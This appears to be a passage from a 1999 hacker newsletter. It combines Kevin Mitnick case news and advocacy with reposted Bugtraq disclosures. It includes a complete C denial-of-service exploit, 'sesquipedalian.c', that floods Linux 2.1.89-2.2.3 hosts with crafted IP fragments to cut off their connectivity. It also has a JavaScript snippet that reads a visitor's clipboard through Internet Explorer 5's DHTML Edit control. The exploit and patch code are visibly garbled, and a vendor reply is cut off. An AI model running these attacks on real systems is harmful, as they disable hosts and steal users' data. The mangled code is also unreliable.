This article is located at
http://newswire.com.au/9903/nfraud.htm
@HWA
04.0 Mitnick Updates
~~~~~~~~~~~~~~~
04.1 The Bumper Sticker Stays
~~~~~~~~~~~~~~~~~~~~~~~~
from Chaos theory
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2229344,00.html
After reflecting on the long, strange case of Kevin Mitnick,
I've decided that the "Free Kevin" bumper sticker's not
coming off my car-- not yet.
By Kevin Poulsen March 22, 1999
After four long years in the house of many doors, 35-year-old Kevin
Mitnick is ready to swallow a bitter pill, plead guilty to some of the
twenty-five felonies on his indictment plate and accept a prison
sentence a few months longer than the time he's already spent in stir.
But I'm not scraping the Free Kevin bumper sticker from my car any time
soon.
The sticker stays because Tuesday's sealed plea agreement is now on the
desk of Judge Mariana Pfaelzer, who may yet reject it as summarily as she
refused to allow him the due process of a bail hearing.
The sticker also stays because Mitnick is still facing a dusty California
state charge from the early '90s which threatens to flip him out of the
frying pan of federal lockup and into the fire of the notorious Los
Angeles Country Jail-- better known as Hell.
And even after his eventual release, Mitnick will spend up to three
years in a technophobic virtual prison, barred from touching anything
with a trace of silicon in it.
So the sticker will continue to adorn my bumper as a reminder of the
end of an era, and the dawn of a new and harsh morning. Kevin grew up
to the extent that he did at a time when computers were still seen as
mysterious and arcane, and exploring them was an innocent and joyful
pastime for a few privileged youngsters. There was no talk of cyber-
terrorism then; no suggestion that teenage technophiles were foreign
operatives acting to overthrow the government. Kids who weren't old
enough to drive were manipulating dizzying technology from their own
bedrooms, and it was magic, pure and simple.
Kevin Mitnick was already a legendary magician when I got my first
computer in the early '80s. In today's Internet age, talentless
teenaged taggers make national headlines by using pre-fab cracking
tools to deface sitting-duck websites. So it takes some imagination
to understand the genuine skill and artistry possessed by the
likes of Kevin.
He gained his knowledge from dumpsters and libraries and by tricking
the guardians of technology with telephone con games.Applying that
knowledge, doing things that weren't supposed to be possible,required
creativity, resourcefulness, and tools that couldn't simply be downloaded.
He was the archetypal trickster, sharing the joy of discovery with
friends and loved ones through ingenious pranks; his hapless victims
usually ended up too impressed with the magic to be overly annoyed
with the inconvenience. While it seems inconceivable now, Mitnick didn't
even cloak his efforts under a pseudonym. He was simply Kevin Mitnick.
There was no reason to hide because what he was doing wasn't a crime.
Nobody even minded much at first. It was all good clean fun.
The Playground's Closed
Then the world began to change, while Kevin remained the same.
Communism died, and a notional hacker threat replaced the red
menace as the enemy of everything good, decent, and American.
The Internet took off in the early '90s, and pressure grew in
Congress to make cyberspace safe for shopping. Computers
were no longer the billion-dollar brains controlling our lives;
instead they were on our desks and in our homes, and no one
liked the idea that people like Kevin might get into them and
muck around.
Suddenly, the hacking that everyone around him thought was
clever, amusing, and harmless during Mitnick's formative years
became "computer fraud and abuse." Examining computer source
code became "theft of proprietary information," and was equated
to stealing money from a bank.
Before he knew it, Kevin was a "danger to the community," held
without bail like a murderer. And his rights were given the
treatment normally reserved for accused drug kingpins. He was soon
in front of an openly hostile court, facing the full brunt of a
federal prosecution, as he watched the seasons change through the
semitransparent polymer slits that pass for jailhouse windows.
There was never any doubt that Kevin was guilty of at least some
of the charges against him. There was never any doubt that he
caused a lot of innocent people some serious hassles, and he needed
to be slapped down. That was never really he point. The "Free Kevin"
bumper sticker is on my car because every day that he spends locked
up raises the punitive bar of zero tolerance another notch.
Kevin Mitnick never damaged anything. He never stole a dime, never
tried to profit from his efforts. He remained a laughing Peter Pan,
while the world changed. I suspect he never really understood that
his victims were no longer laughing along with him. He never lost
his innocence.
The sticker is there as a reminder of the new paradigm that punishes
dumb innocence more severely than true guilt more harshly than fraud,
theft, and robbery. The sticker is there because jail does a slow
violence to a person, and Kevin Mitnick didn't deserve four years of
that violence.
-=-
-=-
04.2 Mitnick's Judgment Day at Hand
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Douglas Thomas
9:00 a.m. 25.Mar.99.PST
LOS ANGELES -- Celebrity cracker Kevin Mitnick will appear before US
District Court Judge Marianne Pfaelzer on Friday for what could be the
last time. Pfaelzer is scheduled to rule on a plea agreement jointly
submitted by the government and defense team attorneys. Although neither
side has discussed the details, a report leaked last week said Mitnick
will plead guilty in exchange for a reduced sentence. The arrangement
reportedly calls for Mitnick to spend at least an additional year in
prison.
Mitnick, in custody since 1995, is charged with copying proprietary
software from the computers of cellular telephone manufacturers. Over
the years, he has grown to be the cause célèbre of hackers and crackers
the world over. Friday's scheduled appearance won't be the first time
that Pfaelzer has considered a plea agreement from Mitnick.
In 1989, Mitnick pleaded guilty to possessing unauthorized long-distance
codes and copying security software from the Digital Equipment Corporation.
Pfaelzer rejected a plea bargain in that case, and Mitnick spent a year in
prison and six months in a halfway house.
If Pfaelzer accepts the current plea, it would mean the end of the federal
indictment. Mitnick, however, still faces state charges stemming from a
1993 arrest. He is accused of fraudulently obtaining information from the
Department of Motor Vehicles and faxing it to a copy shop in Los Angeles.
If found guilty, Mitnick could face up to four years of additional prison time.
04.3 Why We Still Have to Free Kevin Mitnick...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Update from www.kevinmitnick.com
Why We Still Have to Free Kevin Mitnick...
Assistant US Attorneys Defy Court Order Again
March 30, 1999
So Kevin Mitnick has pleaded guilty and reached an agreement with the federal
authorities. The story is over. Thanks for participating. You can all go home
now.
Not so fast.
If you've ever been robbed at gunpoint, you know the feeling of wanting to
resist, but then giving up your valuables because you feared the consequences
of what would happen if you resisted more vigorously. We all want to be heroes,
but there comes a time when one needs to make a painful sacrifice in order to
survive at all.
For more than four years, Kevin has held firm in prison, maintaining his
innocence while trying to build a defense against the government's charges. The
process of constructing such a case is a monumental one, even for highly paid
defense attorneys. Now add to the mix the reality of being held captive in a
federal prison that limits your "participation" in your defense to 20 minute
collect phone calls and five hours per week in an inadequate law library, and
you may begin to see what it was like.
Not there yet? Kevin's legal team was overworked and underfunded whereas the
prosecution had unlimited resources and as much time as they needed, not to
mention a compliant court that granted them every excuse for their manipulation
of the facts and circumstances in this case.
Government Defiance of Court Order
Apparently unwilling to miss the opportunity to kick someone while they're
down, government prosecutors David Schindler and Christopher Painter have
walked through Alice's looking glass and turned the law on its head once again
-- they have instructed the legal staff at the Metropolitan Detention Center
(MDC) that Kevin will no longer need access to the laptop computer that Kevin
has been using to prepare his defense; first for the trial, and now for the
sentencing hearing scheduled for June 14, 1999. Here are the circumstances:
The legal staff at MDC supervises the prison's compliance with all legal matters
affecting the prison. Kevin and his legal team convene in the attorney's visiting
room at MDC to use a laptop computer to review the electronic evidence in Kevin's
case. Kevin is currently reviewing that evidence to counter the government's
likely arguments in support of restitution requirements, which in turn are based
upon fictional losses alleged to have been suffered by the alleged victims in this
case.
Illegal Interference by Government
On Monday, March 29, Kevin met his legal team in the visiting room, where they were
going to use the laptop computer to review evidence in preparation for Kevin's
sentencing hearing on June 14. After waiting two hours, Kevin was informed that
either Assistant U.S. Attorneys Schindler or Painter had incorrectly advised MDC
Legal Staff that Kevin would "no longer be needing access to the computer," and
consequently, Kevin would not be permitted access to the laptop in order to prepare
for his sentencing hearing.
Defense Attorney Asserts Federal Court Order
One member of Kevin's defense team (standing in for attorney Don Randolph, Kevin's
attorney of record in this case who is currently on vacation) asserted unequivocally
that there is a federal court order in place with the MDC ordering -- not suggesting,
but ordering -- the MDC to provide access to a laptop computer for Kevin and his legal
staff.
Government's "Logic" Defies Justification
Logic would suggest that if government prosecutors object to a federal court order,
it is their responsibility to petition the court for redress. The actions by the
government are an attempt to turn the situation on its head, and constitute an
apparent effort by AUSAs Schindler and/or Painter to unlawfully influence the
behavior of the legal staff of MDC. In addition, they may have known that Kevin's
lead defense attorney was scheduled to be out of town this week, thus increasing
the likelihood that they would succeed in delaying Kevin's access to the evidence
against him.
Prosecutors in Direct Violation of Court Order
Actions by AUSAs Schindler and/or Painter to manipulate legal staff at MDC are in
direct violation of a federal court order by Judge Marianna Pfaelzer ordering
the MDC to provide a laptop computer to Kevin Mitnick. Their actions are in violation
of federal law, and at this difficult stage of Kevin's case, can have no other
purpose than to interfere with Kevin's right to participate fully in his defense.
Call Your Congresspeople and Local Media
We urge you to call your United States Representative and Senator as well as your
local news media to alert them to the apparently willful violation of a federal
court order by sworn officers of the court. Calls to the office of Rep. Henry
Waxman (D-CA) may prove especially helpful.
@HWA
04.4 Mitnick gets 46 months?
~~~~~~~~~~~~~~~~~~~~~~~
Mitnick Sentenced to 46 Months
by Douglas Thomas
3:00 a.m. 29.Mar.99.PST
The case is not closed on Kevin Mitnick, who was sentenced Friday to 46 months
in prison after pleading guilty to seven counts of wire and computer fraud.
The notorious cracker still faces California charges for computer fraud.
US District Judge Mariana Pfaelzer accepted Mitnick's guilty plea to five of 25
federal counts of fraud plus two counts of fraud in Northern California.
No date has been set for a trial on Southern California charges, which stem from
a 1993 arrest in which Mitnick was accused of fraudulently obtaining information
from the Department of Motor Vehicles. If convicted of those charges, he could
face an additional four years behind bars.
Friday's plea agreement set total damages of up to US$10 million. Prosecutors and
defense lawyers could not reach agreement on restitution, which will be determined
at Mitnick's sentencing hearing, scheduled for 14 June. Final motions and a pre-
sentence investigation report are due by 1 June.
Mitnick has already spent 48 months in a Los Angeles detention center, including 14
months for violating conditions of his supervised release. He could be released to a
halfway house this fall.
But US Attorney David Schindler said Mitnick would be in prison "at least through next
year."
Don Randolph, Mitnick's attorney, said his client was relieved to have his federal
case resolved. In a prepared statement, Randolph said, "[Mitnick] can now see light at
the end of the tunnel, and has a reasonable certainty that it is not another train approaching."
@HWA
05.0 Sesquipedalian.c 0 length connection resetting exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 24 Mar 1999 23:19:37 -0500
From: John McDonald
To: BUGTRAQ@netspace.org
Subject: DoS for Linux 2.1.89 - 2.2.3: 0 length fragment bug
Hi,
The recent release of the Linux 2.2.4 kernel fixed a remote denial of
service problem in the IP fragment handling code. If you are running a
Linux kernel between 2.1.89 and 2.2.3, it would probably be a good idea to
get the latest version. In case that isn't feasible for you, I've included
a patch in this post. The impact of this problem is that a remote attacker
can effectively disable a target's IP connectivity. However, for the
attack to succeed, the attacker will have to deliver several thousand
packets to the target, which can take up to several minutes. A quick
exploit and the patch are appended to the end of this post.
The problem starts in ip_glue() in ip_fragment.c:
/* Copy the data portions of all fragments into the new buffer. */
fp = qp->fragments;
count = qp->ihlen;
while(fp) {
if ((fp->len len) > skb->len))
goto out_invalid;
memcpy((ptr + fp->offset), fp->ptr, fp->len);
if (count == qp->ihlen) {
skb->dst = dst_clone(fp->skb->dst);
skb->dev = fp->skb->dev;
}
count += fp->len;
fp = fp->next;
}
The problem in this code is that if you can get a fragment into the
qp->fragments list that has a length of 0, and is the first fragment in the
list, then the call to dst_clone() will happen an extra time. The first time
through the loop, count will necessarily equal qp->ihlen, causing
dst_clone() to be called. However, if fp->len happens to equal 0, then count
+= fp->len won't increase it, and the next time through the loop, count will
still equal qp->ihlen. dst_clone() increments a usage count on an element in
the routing cache. Our 0 length fragment will cause this element in the
cache to become stranded. The kernel will not free it when it does the
garbage collection of the cache because it will think it is currently in
use.
The other component of the problem is that the call to allocate a new entry
in the routing cache does a check to see if the hashtable that comprises the
cache is at a saturated state. If it is, it proceeds to do a garbage
collection. If the number of entries in the cache, after this garbage
collection, is still higher than the threshold, then dst_alloc() will fail.
So, if we generate enough stranded entries in the routing cache (4096 in
2.2.3) via our malicious frags, then all further calls to dst_alloc will
fail.
We can get a 0 length fragment into the head of the list by doing the
following:
Send a fragment at offset 0, with a length of X, and IP_MF set. This creates
our list.
Send a 0 length fragment at offset 0, where the ip header length is equal to
the ip total length, and IP_MF is set. This will be treated as coming before
the fragment already in our list, because it has an offset equal to the
offset of the existing fragment. It doesn't overlap any, because it's end is
equal to the following fragment's offset.
Send a fragment at offset X, with IP_MF not set. This will mark the end of
our set of fragments. ip_done() will return true because it will see the
first frag going from 0 to 0, the second going from 0 to X, and the third
going from X to the end. Our fragments will get passed into ip_glue().
-horizon
Here is the patch:
--- linux-2.2.3/net/ipv4/ip_fragment.c Wed Mar 24 22:48:26 1999
+++ linux/net/ipv4/ip_fragment.c Wed Mar 24 22:44:24 1999
@@ -17,6 +17,7 @@
* xxxx : Overlapfrag bug.
* Ultima : ip_expire() kernel panic.
* Bill Hawes : Frag accounting and evictor fixes.
+ * John McDonald : 0 length frag bug.
*/
#include
@@ -357,7 +358,7 @@
fp = qp->fragments;
count = qp->ihlen;
while(fp) {
- if ((fp->len len) > skb->len))
+ if ((fp->len <= + || FP- 0) ((COUNT>len) > skb->len))
goto out_invalid;
memcpy((ptr + fp->offset), fp->ptr, fp->len);
if (count == qp->ihlen) {
And here is the exploit:
/*
* sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3
*
* by horizon
*
* This sends a series of IP fragments such that a 0 length fragment is first
* in the fragment list. This causes a reference count on the cached routing
* information for that packet's originator to be incremented one extra time.
* This makes it impossible for the kernel to deallocate the destination entry
* and remove it from the cache.
*
* If we send enough fragments such that there are at least 4096 stranded
* dst cache entries, then the target machine will no longer be able to
* allocate new cache entries, and IP communication will be effectively
* disabled. You will need to set the delay such that packets are not being
* dropped, and you will probably need to let the program run for a few
* minutes to have the full effect. This was written for OpenBSD and Linux.
*
* Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing.
*/
#include
#include
#include
#include
#include
#include
#include
#include
struct my_ip_header
{
unsigned char ip_hl:4, /* header length */
ip_v:4; /* version */
unsigned char ip_tos; /* type of service */
unsigned short ip_len; /* total length */
unsigned short ip_id; /* identification */
unsigned short ip_off; /* fragment offset field */
#define IP_RF 0x8000 /* reserved fragment flag */
#define IP_DF 0x4000 /* dont fragment flag */
#define IP_MF 0x2000 /* more fragments flag */
#define IP_OFFMASK 0x1fff /* mask for fragmenting bits */
unsigned char ip_ttl; /* time to live */
unsigned char ip_p; /* protocol */
unsigned short ip_sum; /* checksum */
unsigned long ip_src, ip_dst; /* source and dest address */
};
struct my_udp_header
{
unsigned short uh_sport;
unsigned short uh_dport;
unsigned short uh_ulen;
unsigned short uh_sum;
};
#define IHLEN (sizeof (struct my_ip_header))
#define UHLEN (sizeof (struct my_udp_header))
#ifdef __OpenBSD__
#define EXTRA 8
#else
#define EXTRA 0
#endif
unsigned short checksum(unsigned short *data,unsigned short length)
{
register long value;
u_short i;
for(i=0;i<(LENGTH>>1);i++)
value+=data[i];
if((length&1)==1)
value+=(data[i]<<8); VALUE="(value&65535)+(value">>16);
return(~value);
}
unsigned long resolve( char *hostname)
{
long result;
struct hostent *hp;
if ((result=inet_addr(hostname))==-1)
{
if ((hp=gethostbyname(hostname))==0)
{
fprintf(stderr,"Can't resolve target.\n");
exit(1);
}
bcopy(hp->h_addr,&result,4);
}
return result;
}
void usage(void)
{
fprintf(stderr,"usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n");
exit(0);
}
void sendem(int s, unsigned long source, unsigned long dest,
unsigned short sport, unsigned short dport)
{
static char buffer[8192];
struct my_ip_header *ip;
struct my_udp_header *udp;
struct sockaddr_in sa;
bzero(&sa,sizeof(struct sockaddr_in));
sa.sin_family=AF_INET;
sa.sin_port=htons(sport);
sa.sin_addr.s_addr=dest;
bzero(buffer,IHLEN+32);
ip=(struct my_ip_header *)buffer;
udp=(struct my_udp_header *)&(buffer[IHLEN]);
ip->ip_v = 4;
ip->ip_hl = IHLEN >>2;
ip->ip_tos = 0;
ip->ip_id = htons(random() & 0xFFFF);
ip->ip_ttl = 142;
ip->ip_p = IPPROTO_UDP;
ip->ip_src = source;
ip->ip_dst = dest;
udp->uh_sport = htons(sport);
udp->uh_dport = htons(dport);
udp->uh_ulen = htons(64-UHLEN);
udp->uh_sum = 0;
/* Our first fragment will have an offset of 0, and be 32 bytes
long. This gets added as the only element in the fragment
list. */
ip->ip_len = htons(IHLEN+32);
ip->ip_off = htons(IP_MF);
ip->ip_sum = 0;
ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);
if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) ip_len = htons(IHLEN);
ip->ip_off = htons(IP_MF);
ip->ip_sum = 0;
ip->ip_sum = checksum((u_short *)buffer,IHLEN);
if (sendto(s,buffer,IHLEN+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) ip_len = htons(IHLEN+32);
ip->ip_off = htons(32/8);
ip->ip_sum = 0;
ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);
if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa))
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: IE 5 security vulnerabilities
Greetings,
Microsoft delivers with IE 5 an Active X control called "DHTML
Edit control Safe for Scripting for IE 5". In my opinion this
control IS NOT SAFE AT ALL . I have found two vulnerabilities
in this component : It makes public the clipboard and it allows
cross-frame access.
IE 4 is also affected as far as the control is a signed component
and the browser will download it from MS site.(see below my
comments about the CLSID).
Demos are available at
http://pages.whowhere.com/computers/cuartangojc/dhtmle1.html
I will briefly try to summarize the implications of this issues :
1- The hole makes public the clipboard.
There is nothing new here. This is the third time I have reported
this kind of vulnerability. MS says that this issue can be
blocked by setting the "Allow paste operations via script" to
'prompt'. This security option is set to 'enable' by default
(Medium security). IE 4 does not have this option and there is no
way to avoid the exploit.
2- The hole allows cross-frame access
The first Internet browser security rule is : scripts can only
interact only whit documents same domain and protocol. MS calls
this the cross-frame security, Netscape refers to this rule as
"The same origin security policy". DHTML Editor violates this
rule and allows "transaction spoofing", a malicious script can
submit transactions without the user knowledge. I have asked my
lawyer consultant about the issue and their response was :
"Noboby can anymore use the IP addrress as a proof of an Internet
crime against Internet Explorer users". MS says : "We don't see
that this constitutes a security issue" .
3- Even if Microsoft fixes the hole the hole could exist forever. Why ?
As far as I know this is the first time a hole is "SIGNED". MS
has released an "dhtmed.cab" file as an ActiveX component signed
by Microsoft ,anibody can distribute this file and the victim will
only see a message telling him that the component is "Microsoft
signed", I trust MS, everybody trust MS, we will accept the ActiveX.
MS has invented a very clever method to sign software, but there is
not a way to revoke the signature.
4- There is something rare in the CLSID
Whenever an HTML page references a not registered CLSID nothing
happens, just the object is not created. The "DHTML Edit Control"
CLSID (clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A) is very special,
Internet Explorer (4 and 5) will try to download the component from
MS even if CODEBASE is not defined for the object. Is this a
documented feature ? You can test this behaviour, : unregister the
component "dhtmle.ocx" (using regsvr32.exe) and then load the page
http://pages.whowhere.com/computers/cuartangojc/dhtmle2.html
Why the browser decides to go to MS site ? It only knows :
clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A
Acoording whit MS documentation a CODEBASE parameter must be
explicited in the OBJECT "object" to download the component.
Any idea ?
Regards,
Cuartango
-------------------------------------------------------------------------------
http://pages.whowhere.com/computers/cuartangojc/dhtmle1.html
The DHTML Editor holes
Microsoft delivers with IE 5 an Active X control called DHTML edit control,
The Microsoft Dynamic HTML (DHTML) Editing Component allows Web authors and
application developers to add WYSIWYG DHTML editing capabilities to their Web
sites and applications. The control has two versions : DHTML Edit Control for
IE 5 and DHTML Edit
Control Safe for Scripting for IE 5
The first one is of course marked as not safe for scripting and you will be
warned if an HTML page contains this object.
The problem I have found : The second one is not safe at all. "DHTML Edit
Control Safe for Scripting for IE 5" has in fact at least two security holes :
1- It makes public your clipboard (demo).
According with Microsoft security rules access to Windows clipboard content is
forbidden to Internet Explorer scripts unless the clipboard content was owned
by the Explorer itself. This issue represents an important privacy leak.
Workaround : Set security option "Allow paste operations via script" to "prompt".
2- It allows "cross-frame" access (demo).
An HTML page or frame can read/write contents in frames owned by any domain,
which is forbiden by cross-fame security rules. And still worst, It allows
Tansaction spoofing. This is a very serious danger. The Safe version of
ActiveX is not able to navigate but It can SUBMIT FORMS which means that a
malicious WEB page (or E-Mail) can performs transactions agains any WEB site
but YOU will be responsible because the transaction will have your own IP address.
IE 4 is also affected if you accept the download of the ActiveX (Signed by Microsoft)
Last update March 24 Año del señor de 1999
-------------------------------------------------------------------------------
http://pages.whowhere.com/computers/cuartangojc/dhtmle2.html
DHTMLE Clipboard vulnerability
DHTML Editor Clipboard
vulnerability
According with Microsoft security rules access
to Windows clipboard content is forbidden to Internet Explorer scripts unless the
clipboard content was owned by the Explorer itself. If an script performs a
"paste" operation over an input text box the operation will succeed only if data
were copied to the clipboard from the Internet Explorer. The DHTMLE editor
delivered whit Internet Explorer 5 violates the clipboard security rule. The clipboard
data can then be transferred to a form input box and posted to a malicious WEB.
To see the demo "copy" some text (from any application) and click the
button below :
The box below is a Input Text
Area Box your clipboard text data should be here
The box below is"DHTML Edit Control Safe for Scripting for IE
5"
The script making public
the clipboard is very simple :
function getcb()
{
dh.DOM.body.innerHTML="";
// clear body
dh.execCommand(5032);
// paste
S1.value = dh.DOM.body.innerText; // copy to text area
}
The box in the righ
is an DHTML Edit Control Safe for scripting.
It shows a form loaded from a diferent domain (www.angelfire.com).
Click the button below and I will fill the form and submit It.
Dont worry about the message displayed. It is only a demo.
A malicious script inserted in a WEB page or in an HTML
formated e-mail can submit transactions that will contain your IP address. (Imagine an
script writting menaces in the White House guess book).
-------------------------------------------------------------------------------
Date: Thu, 25 Mar 1999 10:06:01 -0800
From: Harry Goodwin
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: IE 5 security vulnerabilities
I wanted to take a moment to thank Juan Carlos for bringing these issues to
Microsoft's attention prior to posting the issues publicly. I also wanted
to post Microsoft's response to the issues he's discovered.
1) Internet Explorer has customizable security settings in
place for users who are concerned about allowing certain functionality. In
this particular case, concerned users can easily block this behavior by
checking either 'disable' or 'prompt' under "Allow paste operations via
script"
in the custom settings section in security zones. Using the IEAK, admins
can also adjust the default setting for this option before distributing
Internet Explorer to their users. The option is set to 'enable' by default
to
allow enhanced functionality.
2) Upon investigation we did find a cross domain security
violation in the DHTML edit control which we will revoke, fix, and release.
3) Internet Explorer has a mechanism in place which allows
Microsoft to release a .reg file to block ActiveX controls by changing a
bit in the registry.
4) The following information found on MSDN (search on
CodeBaseSearchPath) addresses this concern: When Internet Component
Download is called to download code, it traverses the Internet search path
to
look for the desired component. This path is a list of object store servers
that will be queried every time components are downloaded using
CoGetClassObjectFromURL. This way, even if an